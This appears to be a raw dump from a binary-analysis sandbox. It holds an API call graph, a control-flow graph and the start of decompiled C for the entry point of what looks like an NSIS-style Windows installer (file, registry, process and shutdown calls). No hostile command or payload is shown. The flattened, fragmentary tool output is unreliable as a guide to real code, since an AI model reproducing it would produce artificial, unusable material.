404fc9 25 API calls 5298->5301 5300 404fc9 25 API calls 5299->5300 5303 4021b7 5299->5303 5300->5303 5302 4021f8 SHFileOperationA 5301->5302 5302->5299 5302->5303 5304 40220c 5305 402213 5304->5305 5308 402226 5304->5308 5306 405d00 18 API calls 5305->5306 5307 402220 5306->5307 5309 4054f2 MessageBoxIndirectA 5307->5309 5309->5308 5310 401490 5311 404fc9 25 API calls 5310->5311 5312 401497 5311->5312 5313 100015d0 5314 100014d8 4 API calls 5313->5314 5316 100015e8 5314->5316 5315 1000162e GlobalFree 5316->5315 5317 10001603 5316->5317 5318 1000161a VirtualFree 5316->5318 5317->5315 5318->5315 5319 401b11 5320 401b62 5319->5320 5321 401b1e 5319->5321 5322 401b66 5320->5322 5323 401b8b GlobalAlloc 5320->5323 5324 401ba6 5321->5324 5329 401b35 5321->5329 5334 402226 5322->5334 5340 405cde lstrcpynA 5322->5340 5326 405d00 18 API calls 5323->5326 5325 405d00 18 API calls 5324->5325 5324->5334 5327 402220 5325->5327 5326->5324 5333 4054f2 MessageBoxIndirectA 5327->5333 5338 405cde lstrcpynA 5329->5338 5330 401b78 GlobalFree 5330->5334 5332 401b44 5339 405cde lstrcpynA 5332->5339 5333->5334 5336 401b53 5341 405cde lstrcpynA 5336->5341 5338->5332 5339->5336 5340->5330 5341->5334 4266 401595 4267 4029fd 18 API calls 4266->4267 4268 40159c SetFileAttributesA 4267->4268 4269 4015ae 4268->4269 5342 401c95 5343 4029e0 18 API calls 5342->5343 5344 401c9c 5343->5344 5345 4029e0 18 API calls 5344->5345 5346 401ca4 GetDlgItem 5345->5346 5347 4024cb 5346->5347 5348 404115 5349 40412b 5348->5349 5354 404237 5348->5354 5352 403fcc 19 API calls 5349->5352 5350 4042a6 5351 40437a 5350->5351 5353 4042b0 GetDlgItem 5350->5353 5359 404033 8 API calls 5351->5359 5355 404181 5352->5355 5356 4042c6 5353->5356 5357 404338 5353->5357 5354->5350 5354->5351 5358 40427b GetDlgItem SendMessageA 5354->5358 5360 403fcc 19 API calls 5355->5360 5356->5357 5361 4042ec 6 API calls 5356->5361 5357->5351 5362 40434a 5357->5362 5379 403fee KiUserCallbackDispatcher 5358->5379 5364 404375 5359->5364 5365 40418e CheckDlgButton 5360->5365 5361->5357 5366 404350 SendMessageA 5362->5366 5367 404361 5362->5367 5377 403fee KiUserCallbackDispatcher 5365->5377 5366->5367 5367->5364 5370 404367 SendMessageA 5367->5370 5368 4042a1 5371 40439f SendMessageA 5368->5371 5370->5364 5371->5350 5372 4041ac GetDlgItem 5378 404001 SendMessageA 5372->5378 5374 4041c2 SendMessageA 5375 4041e0 GetSysColor 5374->5375 5376 4041e9 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5374->5376 5375->5376 5376->5364 5377->5372 5378->5374 5379->5368 4275 403217 #17 SetErrorMode OleInitialize 4348 406009 GetModuleHandleA 4275->4348 4279 403287 GetCommandLineA 4353 405cde lstrcpynA 4279->4353 4281 403299 GetModuleHandleA 4282 4032b0 4281->4282 4283 405799 CharNextA 4282->4283 4284 4032c4 CharNextA 4283->4284 4292 4032d4 4284->4292 4285 40339e 4286 4033b1 GetTempPathA 4285->4286 4354 4031e3 4286->4354 4288 4033c9 4289 403423 DeleteFileA 4288->4289 4290 4033cd GetWindowsDirectoryA lstrcatA 4288->4290 4362 402c79 GetTickCount GetModuleFileNameA 4289->4362 4293 4031e3 11 API calls 4290->4293 4291 405799 CharNextA 4291->4292 4292->4285 4292->4291 4296 4033a0 4292->4296 4295 4033e9 4293->4295 4295->4289 4298 4033ed GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4295->4298 4446 405cde lstrcpynA 4296->4446 4297 403437 4304 405799 CharNextA 4297->4304 4333 4034bd 4297->4333 4343 4034cd 4297->4343 4300 4031e3 11 API calls 4298->4300 4302 40341b 4300->4302 4302->4289 4302->4343 4306 403452 4304->4306 4312 403498 4306->4312 4313 4034fc lstrcatA lstrcmpiA 4306->4313 4307 4034e6 4472 4054f2 4307->4472 4308 4035da 4310 40365d ExitProcess 4308->4310 4314 406009 3 API calls 4308->4314 4447 40585c 4312->4447 4317 403518 CreateDirectoryA SetCurrentDirectoryA 4313->4317 4313->4343 4318 4035e9 4314->4318 4320 40353a 4317->4320 4321 40352f 4317->4321 4322 406009 3 API calls 4318->4322 4477 405cde lstrcpynA 4320->4477 4476 405cde lstrcpynA 4321->4476 4325 4035f2 4322->4325 4327 406009 3 API calls 4325->4327 4328 4035fb 4327->4328 4330 403649 ExitWindowsEx 4328->4330 4336 403609 GetCurrentProcess 4328->4336 4329 4034b2 4462 405cde lstrcpynA 4329->4462 4330->4310 4334 403656 4330->4334 4332 405d00 18 API calls 4335 403579 DeleteFileA 4332->4335 4392 403767 4333->4392 4486 40140b 4334->4486 4338 403586 CopyFileA 4335->4338 4345 403548 4335->4345 4340 403619 4336->4340 4338->4345 4339 4035ce 4341 405b92 40 API calls 4339->4341 4340->4330 4341->4343 4463 403675 4343->4463 4344 405d00 18 API calls 4344->4345 4345->4332 4345->4339 4345->4344 4347 4035ba CloseHandle 4345->4347 4478 405b92 4345->4478 4483 405491 CreateProcessA 4345->4483 4347->4345 4349 406030 GetProcAddress 4348->4349 4350 406025 LoadLibraryA 4348->4350 4351 40325c SHGetFileInfoA 4349->4351 4350->4349 4350->4351 4352 405cde lstrcpynA 4351->4352 4352->4279 4353->4281 4355 405f49 5 API calls 4354->4355 4357 4031ef 4355->4357 4356 4031f9 4356->4288 4357->4356 4489 40576e lstrlenA CharPrevA 4357->4489 4360 40599e 2 API calls 4361 403215 4360->4361 4361->4288 4492 40596f GetFileAttributesA CreateFileA 4362->4492 4364 402cbc 4391 402cc9 4364->4391 4493 405cde lstrcpynA 4364->4493 4366 402cdf 4494 4057b5 lstrlenA 4366->4494 4370 402cf0 GetFileSize 4371 402df1 4370->4371 4389 402d07 4370->4389 4499 402bda 4371->4499 4375 402e34 GlobalAlloc 4377 402e4b 4375->4377 4376 402e8c 4378 402bda 33 API calls 4376->4378 4381 40599e 2 API calls 4377->4381 4378->4391 4380 402e15 4382 4031b6 ReadFile 4380->4382 4384 402e5c CreateFileA 4381->4384 4385 402e20 4382->4385 4383 402bda 33 API calls 4383->4389 4386 402e96 4384->4386 4384->4391 4385->4375 4385->4391 4514 4031cc SetFilePointer 4386->4514 4388 402ea4 4515 402f1f 4388->4515 4389->4371 4389->4376 4389->4383 4389->4391 4530 4031b6 4389->4530 4391->4297 4393 406009 3 API calls 4392->4393 4394 40377b 4393->4394 4395 403781 4394->4395 4396 403793 4394->4396 4573 405c3c wsprintfA 4395->4573 4397 405bc5 3 API calls 4396->4397 4398 4037be 4397->4398 4400 4037dc lstrcatA 4398->4400 4402 405bc5 3 API calls 4398->4402 4401 403791 4400->4401 4564 403a2c 4401->4564 4402->4400 4405 40585c 18 API calls 4406 40380e 4405->4406 4407 403897 4406->4407 4409 405bc5 3 API calls 4406->4409 4408 40585c 18 API calls 4407->4408 4411 40389d 4408->4411 4410 40383a 4409->4410 4410->4407 4416 403856 lstrlenA 4410->4416 4419 405799 CharNextA 4410->4419 4412 4038ad LoadImageA 4411->4412 4413 405d00 18 API calls 4411->4413 4414 403953 4412->4414 4415 4038d4 RegisterClassA 4412->4415 4413->4412 4418 40140b 2 API calls 4414->4418 4417 40390a SystemParametersInfoA CreateWindowExA 4415->4417 4445 40395d 4415->4445 4420 403864 lstrcmpiA 4416->4420 4421 40388a 4416->4421 4417->4414 4422 403959 4418->4422 4423 403854 4419->4423 4420->4421 4424 403874 GetFileAttributesA 4420->4424 4425 40576e 3 API calls 4421->4425 4427 403a2c 19 API calls 4422->4427 4422->4445 4423->4416 4426 403880 4424->4426 4428 403890 4425->4428 4426->4421 4430 4057b5 2 API calls 4426->4430 4431 40396a 4427->4431 4574 405cde lstrcpynA 4428->4574 4430->4421 4432 403976 ShowWindow LoadLibraryA 4431->4432 4433 4039f9 4431->4433 4434 403995 LoadLibraryA 4432->4434 4435 40399c GetClassInfoA 4432->4435 4436 40509b 5 API calls 4433->4436 4434->4435 4437 4039b0 GetClassInfoA RegisterClassA 4435->4437 4438 4039c6 DialogBoxParamA 4435->4438 4439 4039ff 4436->4439 4437->4438 4440 40140b 2 API calls 4438->4440 4441 403a03 4439->4441 4442 403a1b 4439->4442 4440->4445 4444 40140b 2 API calls 4441->4444 4441->4445 4443 40140b 2 API calls 4442->4443 4443->4445 4444->4445 4445->4343 4446->4286 4576 405cde lstrcpynA 4447->4576 4449 40586d 4450 405807 4 API calls 4449->4450 4451 405873 4450->4451 4452 4034a3 4451->4452 4453 405f49 5 API calls 4451->4453 4452->4343 4461 405cde lstrcpynA 4452->4461 4459 405883 4453->4459 4454 4058ae lstrlenA 4455 4058b9 4454->4455 4454->4459 4456 40576e 3 API calls 4455->4456 4458 4058be GetFileAttributesA 4456->4458 4458->4452 4459->4452 4459->4454 4460 4057b5 2 API calls 4459->4460 4577 405fe2 FindFirstFileA 4459->4577 4460->4454 4461->4329 4462->4333 4464 403690 4463->4464 4465 403686 CloseHandle 4463->4465 4466 4036a4 4464->4466 4467 40369a CloseHandle 4464->4467 4465->4464 4580 4036d2 4466->4580 4467->4466 4473 405507 4472->4473 4474 4034f4 ExitProcess 4473->4474 4475 40551b MessageBoxIndirectA 4473->4475 4475->4474 4476->4320 4477->4345 4479 406009 3 API calls 4478->4479 4480 405b99 4479->4480 4482 405bba 4480->4482 4637 405a16 lstrcpyA 4480->4637 4482->4345 4484 4054c0 CloseHandle 4483->4484 4485 4054cc 4483->4485 4484->4485 4485->4345 4487 401389 2 API calls 4486->4487 4488 401420 4487->4488 4488->4310 4490 403201 CreateDirectoryA 4489->4490 4491 405788 lstrcatA 4489->4491 4490->4360 4491->4490 4492->4364 4493->4366 4495 4057c2 4494->4495 4496 402ce5 4495->4496 4497 4057c7 CharPrevA 4495->4497 4498 405cde lstrcpynA 4496->4498 4497->4495 4497->4496 4498->4370 4500 402c00 4499->4500 4501 402be8 4499->4501 4504 402c10 GetTickCount 4500->4504 4505 402c08 4500->4505 4502 402bf1 DestroyWindow 4501->4502 4503 402bf8 4501->4503 4502->4503 4503->4375 4503->4391 4533 4031cc SetFilePointer 4503->4533 4504->4503 4507 402c1e 4504->4507 4534 406042 4505->4534 4508 402c53 CreateDialogParamA ShowWindow 4507->4508 4509 402c26 4507->4509 4508->4503 4509->4503 4538 402bbe 4509->4538 4511 402c34 wsprintfA 4512 404fc9 25 API calls 4511->4512 4513 402c51 4512->4513 4513->4503 4514->4388 4516 402f4b 4515->4516 4517 402f2f SetFilePointer 4515->4517 4541 40303a GetTickCount 4516->4541 4517->4516 4520 402ff6 4520->4391 4523 40303a 43 API calls 4524 402f82 4523->4524 4524->4520 4525 402ffc ReadFile 4524->4525 4527 402f92 4524->4527 4525->4520 4527->4520 4528 4059e7 ReadFile 4527->4528 4529 402fc5 WriteFile 4527->4529 4528->4527 4529->4520 4529->4527 4531 4059e7 ReadFile 4530->4531 4532 4031c9 4531->4532 4532->4389 4533->4380 4535 40605f PeekMessageA 4534->4535 4536 406055 DispatchMessageA 4535->4536 4537 40606f 4535->4537 4536->4535 4537->4503 4539 402bcd 4538->4539 4540 402bcf MulDiv 4538->4540 4539->4540 4540->4511 4542 4031a4 4541->4542 4543 403069 4541->4543 4544 402bda 33 API calls 4542->4544 4556 4031cc SetFilePointer 4543->4556 4551 402f52 4544->4551 4546 403074 SetFilePointer 4550 403099 4546->4550 4547 4031b6 ReadFile 4547->4550 4549 402bda 33 API calls 4549->4550 4550->4547 4550->4549 4550->4551 4552 40312e WriteFile 4550->4552 4553 403185 SetFilePointer 4550->4553 4557 406109 4550->4557 4551->4520 4554 4059e7 ReadFile 4551->4554 4552->4550 4552->4551 4553->4542 4555 402f6b 4554->4555 4555->4520 4555->4523 4556->4546 4558 40612e 4557->4558 4563 406136 4557->4563 4558->4550 4559 4061c6 GlobalAlloc 4559->4558 4559->4563 4560 4061bd GlobalFree 4560->4559 4561 406234 GlobalFree 4562 40623d GlobalAlloc 4561->4562 4562->4558 4562->4563 4563->4558 4563->4559 4563->4560 4563->4561 4563->4562 4565 403a40 4564->4565 4575 405c3c wsprintfA 4565->4575 4567 403ab1 4568 405d00 18 API calls 4567->4568 4569 403abd SetWindowTextA 4568->4569 4570 4037ec 4569->4570 4571 403ad9 4569->4571 4570->4405 4571->4570 4572 405d00 18 API calls 4571->4572 4572->4571 4573->4401 4574->4407 4575->4567 4576->4449 4578 406003 4577->4578 4579 405ff8 FindClose 4577->4579 4578->4459 4579->4578 4581 4036e0 4580->4581 4582 4036a9 4581->4582 4583 4036e5 FreeLibrary GlobalFree 4581->4583 4584 40559e 4582->4584 4583->4582 4583->4583 4585 40585c 18 API calls 4584->4585 4586 4055be 4585->4586 4587 4055c6 DeleteFileA 4586->4587 4588 4055dd 4586->4588 4594 4034d6 OleUninitialize 4587->4594 4591 405715 4588->4591 4624 405cde lstrcpynA 4588->4624 4590 405603 4592 405616 4590->4592 4593 405609 lstrcatA 4590->4593 4591->4594 4597 405fe2 2 API calls 4591->4597 4596 4057b5 2 API calls 4592->4596 4595 40561c 4593->4595 4594->4307 4594->4308 4598 40562a lstrcatA 4595->4598 4600 405635 lstrlenA FindFirstFileA 4595->4600 4596->4595 4599 40572f 4597->4599 4598->4600 4599->4594 4601 405733 4599->4601 4602 40570b 4600->4602 4622 405659 4600->4622 4603 40576e 3 API calls 4601->4603 4602->4591 4604 405739 4603->4604 4606 405556 5 API calls 4604->4606 4605 405799 CharNextA 4605->4622 4607 405745 4606->4607 4608 405749 4607->4608 4609 40575f 4607->4609 4608->4594 4613 404fc9 25 API calls 4608->4613 4611 404fc9 25 API calls 4609->4611 4611->4594 4612 4056ea FindNextFileA 4614 405702 FindClose 4612->4614 4612->4622 4615 405756 4613->4615 4614->4602 4616 405b92 40 API calls 4615->4616 4619 40575d 4616->4619 4618 40559e 64 API calls 4618->4622 4619->4594 4620 404fc9 25 API calls 4620->4612 4621 404fc9 25 API calls 4621->4622 4622->4605 4622->4612 4622->4618 4622->4620 4622->4621 4623 405b92 40 API calls 4622->4623 4625 405cde lstrcpynA 4622->4625 4626 405556 4622->4626 4623->4622 4624->4590 4625->4622 4634 40594a GetFileAttributesA 4626->4634 4629 405571 RemoveDirectoryA 4631 40557f 4629->4631 4630 405579 DeleteFileA 4630->4631 4632 405583 4631->4632 4633 40558f SetFileAttributesA 4631->4633 4632->4622 4633->4632 4635 405562 4634->4635 4636 40595c SetFileAttributesA 4634->4636 4635->4629 4635->4630 4635->4632 4636->4635 4638 405a65 GetShortPathNameA 4637->4638 4639 405a3f 4637->4639 4640 405a7a 4638->4640 4641 405b8c 4638->4641 4662 40596f GetFileAttributesA CreateFileA 4639->4662 4640->4641 4643 405a82 wsprintfA 4640->4643 4641->4482 4645 405d00 18 API calls 4643->4645 4644 405a49 CloseHandle GetShortPathNameA 4644->4641 4646 405a5d 4644->4646 4647 405aaa 4645->4647 4646->4638 4646->4641 4663 40596f GetFileAttributesA CreateFileA 4647->4663 4649 405ab7 4649->4641 4650 405ac6 GetFileSize GlobalAlloc 4649->4650 4651 405b85 CloseHandle 4650->4651 4652 405ae8 4650->4652 4651->4641 4653 4059e7 ReadFile 4652->4653 4654 405af0 4653->4654 4654->4651 4664 4058d4 lstrlenA 4654->4664 4657 405b07 lstrcpyA 4660 405b29 4657->4660 4658 405b1b 4659 4058d4 4 API calls 4658->4659 4659->4660 4661 405b60 SetFilePointer WriteFile GlobalFree 4660->4661 4661->4651 4662->4644 4663->4649 4665 405915 lstrlenA 4664->4665 4666 40591d 4665->4666 4667 4058ee lstrcmpiA 4665->4667 4666->4657 4666->4658 4667->4666 4668 40590c CharNextA 4667->4668 4668->4665 5380 10001058 5381 1000123b 3 API calls 5380->5381 5383 10001074 5381->5383 5382 100010dc 5383->5382 5384 100014d8 4 API calls 5383->5384 5385 10001091 5383->5385 5384->5385 5386 100014d8 4 API calls 5385->5386 5387 100010a1 5386->5387 5388 100010b1 5387->5388 5389 100010a8 GlobalSize 5387->5389 5390 100010b5 GlobalAlloc 5388->5390 5391 100010c6 5388->5391 5389->5388 5392 100014ff 3 API calls 5390->5392 5393 100010d1 GlobalFree 5391->5393 5392->5391 5393->5382 4748 402519 4749 4029e0 18 API calls 4748->4749 4753 402523 4749->4753 4750 40258d 4751 4059e7 ReadFile 4751->4753 4752 40258f 4757 405c3c wsprintfA 4752->4757 4753->4750 4753->4751 4753->4752 4754 40259f 4753->4754 4754->4750 4756 4025b5 SetFilePointer 4754->4756 4756->4750 4757->4750 5394 100029db 5395 100029f3 5394->5395 5396 10001551 2 API calls 5395->5396 5397 10002a0e 5396->5397 4768 40231c 4769 402322 4768->4769 4770 4029fd 18 API calls 4769->4770 4771 402334 4770->4771 4772 4029fd 18 API calls 4771->4772 4773 40233e RegCreateKeyExA 4772->4773 4774 402663 4773->4774 4775 402368 4773->4775 4776 402380 4775->4776 4777 4029fd 18 API calls 4775->4777 4778 40238c 4776->4778 4781 4029e0 18 API calls 4776->4781 4780 402379 lstrlenA 4777->4780 4779 4023a7 RegSetValueExA 4778->4779 4782 402f1f 46 API calls 4778->4782 4783 4023bd RegCloseKey 4779->4783 4780->4776 4781->4778 4782->4779 4783->4774 5398 40261c 5399 402637 5398->5399 5400 40261f 5398->5400 5401 4027bd 5399->5401 5404 405cde lstrcpynA 5399->5404 5402 40262c FindNextFileA 5400->5402 5402->5399 5404->5401 5412 100010e0 5413 1000110e 5412->5413 5414 1000123b 3 API calls 5413->5414 5422 1000111e 5414->5422 5415 100011c4 GlobalFree 5416 100012bf 2 API calls 5416->5422 5417 100011c3 5417->5415 5418 1000123b 3 API calls 5418->5422 5419 10001278 2 API calls 5423 100011b1 GlobalFree 5419->5423 5420 10001155 GlobalAlloc 5420->5422 5421 100011ea GlobalFree 5421->5422 5422->5415 5422->5416 5422->5417 5422->5418 5422->5419 5422->5420 5422->5421 5422->5423 5424 100012e8 lstrcpyA 5422->5424 5423->5422 5424->5422 5425 4016a1 5426 4029fd 18 API calls 5425->5426 5427 4016a7 GetFullPathNameA 5426->5427 5428 4016df 5427->5428 5429 4016be 5427->5429 5430 402892 5428->5430 5431 4016f3 GetShortPathNameA 5428->5431 5429->5428 5432 405fe2 2 API calls 5429->5432 5431->5430 5433 4016cf 5432->5433 5433->5428 5435 405cde lstrcpynA 5433->5435 5435->5428 5436 403725 5437 403730 5436->5437 5438 403734 5437->5438 5439 403737 GlobalAlloc 5437->5439 5439->5438 5440 401d26 GetDC GetDeviceCaps 5441 4029e0 18 API calls 5440->5441 5442 401d44 MulDiv ReleaseDC 5441->5442 5443 4029e0 18 API calls 5442->5443 5444 401d63 5443->5444 5445 405d00 18 API calls 5444->5445 5446 401d9c CreateFontIndirectA 5445->5446 5447 4024cb 5446->5447 4211 40172c 4212 4029fd 18 API calls 4211->4212 4213 401733 4212->4213 4217 40599e 4213->4217 4215 40173a 4216 40599e 2 API calls 4215->4216 4216->4215 4218 4059a9 GetTickCount GetTempFileNameA 4217->4218 4219 4059da 4218->4219 4220 4059d6 4218->4220 4219->4215 4220->4218 4220->4219 4221 401dac 4229 4029e0 4221->4229 4223 401db2 4224 4029e0 18 API calls 4223->4224 4225 401dbb 4224->4225 4226 401dc2 ShowWindow 4225->4226 4227 401dcd EnableWindow 4225->4227 4228 402892 4226->4228 4227->4228 4230 405d00 18 API calls 4229->4230 4231 4029f4 4230->4231 4231->4223 5455 401eac 5456 4029fd 18 API calls 5455->5456 5457 401eb3 5456->5457 5458 405fe2 2 API calls 5457->5458 5459 401eb9 5458->5459 5461 401ecb 5459->5461 5462 405c3c wsprintfA 5459->5462 5462->5461 5463 40192d 5464 4029fd 18 API calls 5463->5464 5465 401934 lstrlenA 5464->5465 5466 4024cb 5465->5466 5467 4024af 5468 4029fd 18 API calls 5467->5468 5469 4024b6 5468->5469 5472 40596f GetFileAttributesA CreateFileA 5469->5472 5471 4024c2 5472->5471 5473 401cb0 5474 4029e0 18 API calls 5473->5474 5475 401cc0 SetWindowLongA 5474->5475 5476 402892 5475->5476 5477 401a31 5478 4029e0 18 API calls 5477->5478 5479 401a37 5478->5479 5480 4029e0 18 API calls 5479->5480 5481 4019e1 5480->5481 5482 401e32 5483 4029fd 18 API calls 5482->5483 5484 401e38 5483->5484 5485 404fc9 25 API calls 5484->5485 5486 401e42 5485->5486 5487 405491 2 API calls 5486->5487 5490 401e48 5487->5490 5488 401e9e CloseHandle 5492 402663 5488->5492 5489 401e67 WaitForSingleObject 5489->5490 5491 401e75 GetExitCodeProcess 5489->5491 5490->5488 5490->5489 5490->5492 5493 406042 2 API calls 5490->5493 5494 401e90 5491->5494 5495 401e87 5491->5495 5493->5489 5494->5488 5497 405c3c wsprintfA 5495->5497 5497->5494 4241 4015b3 4242 4029fd 18 API calls 4241->4242 4243 4015ba 4242->4243 4259 405807 CharNextA CharNextA 4243->4259 4245 4015c2 4246 40160a 4245->4246 4247 405799 CharNextA 4245->4247 4248 401638 4246->4248 4249 40160f 4246->4249 4250 4015d0 CreateDirectoryA 4247->4250 4254 401423 25 API calls 4248->4254 4251 401423 25 API calls 4249->4251 4250->4245 4252 4015e5 GetLastError 4250->4252 4253 401616 4251->4253 4252->4245 4255 4015f2 GetFileAttributesA 4252->4255 4265 405cde lstrcpynA 4253->4265 4258 401630 4254->4258 4255->4245 4257 401621 SetCurrentDirectoryA 4257->4258 4260 405822 4259->4260 4263 405832 4259->4263 4262 40582d CharNextA 4260->4262 4260->4263 4261 405852 4261->4245 4262->4261 4263->4261 4264 405799 CharNextA 4263->4264 4264->4263 4265->4257 5498 402036 5499 4029fd 18 API calls 5498->5499 5500 40203d 5499->5500 5501 4029fd 18 API calls 5500->5501 5502 402047 5501->5502 5503 4029fd 18 API calls 5502->5503 5504 402051 5503->5504 5505 4029fd 18 API calls 5504->5505 5506 40205b 5505->5506 5507 4029fd 18 API calls 5506->5507 5508 402064 5507->5508 5509 40207a CoCreateInstance 5508->5509 5510 4029fd 18 API calls 5508->5510 5511 40214d 5509->5511 5513 402099 5509->5513 5510->5509 5512 401423 25 API calls 5511->5512 5514 402181 5511->5514 5512->5514 5513->5511 5515 40212f MultiByteToWideChar 5513->5515 5515->5511 5516 4014b7 5517 4014bd 5516->5517 5518 401389 2 API calls 5517->5518 5519 4014c5 5518->5519 5520 4062b8 5522 40613c 5520->5522 5521 406aa7 5522->5521 5523 4061c6 GlobalAlloc 5522->5523 5524 4061bd GlobalFree 5522->5524 5525 406234 GlobalFree 5522->5525 5526 40623d GlobalAlloc 5522->5526 5523->5521 5523->5522 5524->5523 5525->5526 5526->5521 5526->5522 5527 401bb8 5528 4029e0 18 API calls 5527->5528 5529 401bbf 5528->5529 5530 4029e0 18 API calls 5529->5530 5531 401bc9 5530->5531 5532 401bd9 5531->5532 5533 4029fd 18 API calls 5531->5533 5534 4029fd 18 API calls 5532->5534 5537 401be9 5532->5537 5533->5532 5534->5537 5535 401bf4 5538 4029e0 18 API calls 5535->5538 5536 401c38 5539 4029fd 18 API calls 5536->5539 5537->5535 5537->5536 5540 401bf9 5538->5540 5541 401c3d 5539->5541 5542 4029e0 18 API calls 5540->5542 5543 4029fd 18 API calls 5541->5543 5544 401c02 5542->5544 5545 401c46 FindWindowExA 5543->5545 5546 401c28 SendMessageA 5544->5546 5547 401c0a SendMessageTimeoutA 5544->5547 5548 401c64 5545->5548 5546->5548 5547->5548 5549 10002179 5550 10002214 5549->5550 5551 100021de 5549->5551 5551->5550 5552 100021f0 GlobalAlloc 5551->5552 5552->5551 5553 40243a 5554 402b07 19 API calls 5553->5554 5555 402444 5554->5555 5556 4029e0 18 API calls 5555->5556 5557 40244d 5556->5557 5558 402470 RegEnumValueA 5557->5558 5559 402464 RegEnumKeyA 5557->5559 5561 402663 5557->5561 5560 402489 RegCloseKey 5558->5560 5558->5561 5559->5560 5560->5561 4758 40223b 4759 402243 4758->4759 4761 402249 4758->4761 4760 4029fd 18 API calls 4759->4760 4760->4761 4762 402259 4761->4762 4763 4029fd 18 API calls 4761->4763 4764 402267 4762->4764 4765 4029fd 18 API calls 4762->4765 4763->4762 4766 4029fd 18 API calls 4764->4766 4765->4764 4767 402270 WritePrivateProfileStringA 4766->4767 5563 404f3d 5564 404f61 5563->5564 5565 404f4d 5563->5565 5568 404f69 IsWindowVisible 5564->5568 5574 404f80 5564->5574 5566 404f53 5565->5566 5567 404faa 5565->5567 5570 404018 SendMessageA 5566->5570 5569 404faf CallWindowProcA 5567->5569 5568->5567 5571 404f76 5568->5571 5573 404f5d 5569->5573 5570->5573 5572 404894 5 API calls 5571->5572 5572->5574 5574->5569 5575 404914 4 API calls 5574->5575 5575->5567 4792 40173f 4793 4029fd 18 API calls 4792->4793 4794 401746 4793->4794 4795 401764 4794->4795 4796 40176c 4794->4796 4831 405cde lstrcpynA 4795->4831 4832 405cde lstrcpynA 4796->4832 4799 40176a 4803 405f49 5 API calls 4799->4803 4800 401777 4801 40576e 3 API calls 4800->4801 4802 40177d lstrcatA 4801->4802 4802->4799 4809 401789 4803->4809 4804 405fe2 2 API calls 4804->4809 4805 40594a 2 API calls 4805->4809 4807 4017a0 CompareFileTime 4807->4809 4808 401864 4810 404fc9 25 API calls 4808->4810 4809->4804 4809->4805 4809->4807 4809->4808 4812 405cde lstrcpynA 4809->4812 4818 405d00 18 API calls 4809->4818 4824 4054f2 MessageBoxIndirectA 4809->4824 4827 40183b 4809->4827 4830 40596f GetFileAttributesA CreateFileA 4809->4830 4813 40186e 4810->4813 4811 404fc9 25 API calls 4829 401850 4811->4829 4812->4809 4814 402f1f 46 API calls 4813->4814 4815 401881 4814->4815 4816 401895 SetFileTime 4815->4816 4817 4018a7 CloseHandle 4815->4817 4816->4817 4819 4018b8 4817->4819 4817->4829 4818->4809 4820 4018d0 4819->4820 4821 4018bd 4819->4821 4823 405d00 18 API calls 4820->4823 4822 405d00 18 API calls 4821->4822 4825 4018c5 lstrcatA 4822->4825 4826 4018d8 4823->4826 4824->4809 4825->4826 4828 4054f2 MessageBoxIndirectA 4826->4828 4827->4811 4827->4829 4828->4829 4830->4809 4831->4799 4832->4800 5576 40163f 5577 4029fd 18 API calls 5576->5577 5578 401645 5577->5578 5579 405fe2 2 API calls 5578->5579 5580 40164b 5579->5580 5581 40193f 5582 4029e0 18 API calls 5581->5582 5583 401946 5582->5583 5584 4029e0 18 API calls 5583->5584 5585 401950 5584->5585 5586 4029fd 18 API calls 5585->5586 5587 401959 5586->5587 5588 40196c lstrlenA 5587->5588 5593 4019a7 5587->5593 5589 401976 5588->5589 5589->5593 5594 405cde lstrcpynA 5589->5594 5591 401990 5592 40199d lstrlenA 5591->5592 5591->5593 5592->5593 5594->5591

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 403217-4032ae #17 SetErrorMode OleInitialize call 406009 SHGetFileInfoA call 405cde GetCommandLineA call 405cde GetModuleHandleA 7 4032b0-4032b5 0->7 8 4032ba-4032cf call 405799 CharNextA 0->8 7->8 11 403394-403398 8->11 12 4032d4-4032d7 11->12 13 40339e 11->13 14 4032d9-4032dd 12->14 15 4032df-4032e7 12->15 16 4033b1-4033cb GetTempPathA call 4031e3 13->16 14->14 14->15 17 4032e9-4032ea 15->17 18 4032ef-4032f2 15->18 23 403423-40343d DeleteFileA call 402c79 16->23 24 4033cd-4033eb GetWindowsDirectoryA lstrcatA call 4031e3 16->24 17->18 20 403384-403391 call 405799 18->20 21 4032f8-4032fc 18->21 20->11 40 403393 20->40 26 403314-403341 21->26 27 4032fe-403304 21->27 42 4034d1-4034e0 call 403675 OleUninitialize 23->42 43 403443-403449 23->43 24->23 41 4033ed-40341d GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4031e3 24->41 29 403343-403349 26->29 30 403354-403382 26->30 33 403306-403308 27->33 34 40330a 27->34 36 40334b-40334d 29->36 37 40334f 29->37 30->20 38 4033a0-4033ac call 405cde 30->38 33->26 33->34 34->26 36->30 36->37 37->30 38->16 40->11 41->23 41->42 55 4034e6-4034f6 call 4054f2 ExitProcess 42->55 56 4035da-4035e0 42->56 46 4034c1-4034c8 call 403767 43->46 47 40344b-403456 call 405799 43->47 53 4034cd 46->53 60 403458-403481 47->60 61 40348c-403496 47->61 53->42 58 4035e2-4035ff call 406009 * 3 56->58 59 40365d-403665 56->59 87 403601-403603 58->87 88 403649-403654 ExitWindowsEx 58->88 66 403667 59->66 67 40366b-40366f ExitProcess 59->67 68 403483-403485 60->68 63 403498-4034a5 call 40585c 61->63 64 4034fc-403516 lstrcatA lstrcmpiA 61->64 63->42 77 4034a7-4034bd call 405cde * 2 63->77 64->42 70 403518-40352d CreateDirectoryA SetCurrentDirectoryA 64->70 66->67 68->61 72 403487-40348a 68->72 74 40353a-403562 call 405cde 70->74 75 40352f-403535 call 405cde 70->75 72->61 72->68 86 403568-403584 call 405d00 DeleteFileA 74->86 75->74 77->46 97 4035c5-4035cc 86->97 98 403586-403596 CopyFileA 86->98 87->88 91 403605-403607 87->91 88->59 93 403656-403658 call 40140b 88->93 91->88 95 403609-40361b GetCurrentProcess 91->95 93->59 95->88 104 40361d-40363f 95->104 97->86 99 4035ce-4035d5 call 405b92 97->99 98->97 100 403598-4035b8 call 405b92 call 405d00 call 405491 98->100 99->42 100->97 112 4035ba-4035c1 CloseHandle 100->112 104->88 112->97
                                                            C-Code - Quality: 87%
                                                            			_entry_() {
                                                            				int _t38;
                                                            				CHAR* _t43;
                                                            				char* _t46;
                                                            				CHAR* _t48;
                                                            				void* _t52;
                                                            				intOrPtr _t54;
                                                            				int _t56;
                                                            				int _t59;
                                                            				int _t60;
                                                            				int _t64;
                                                            				void* _t86;
